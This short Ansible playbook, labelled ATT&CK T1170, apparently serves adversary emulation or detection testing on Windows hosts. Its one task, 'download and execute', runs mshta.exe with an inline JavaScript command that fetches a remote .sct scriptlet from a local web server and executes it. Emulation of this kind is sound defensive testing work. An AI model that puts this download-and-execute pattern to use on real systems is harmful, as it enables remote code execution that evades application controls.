#T1170 - Mshta
- name: MSHTA - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download and execute
      win_command: |
        c:\windows\system32\mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec();
        
  
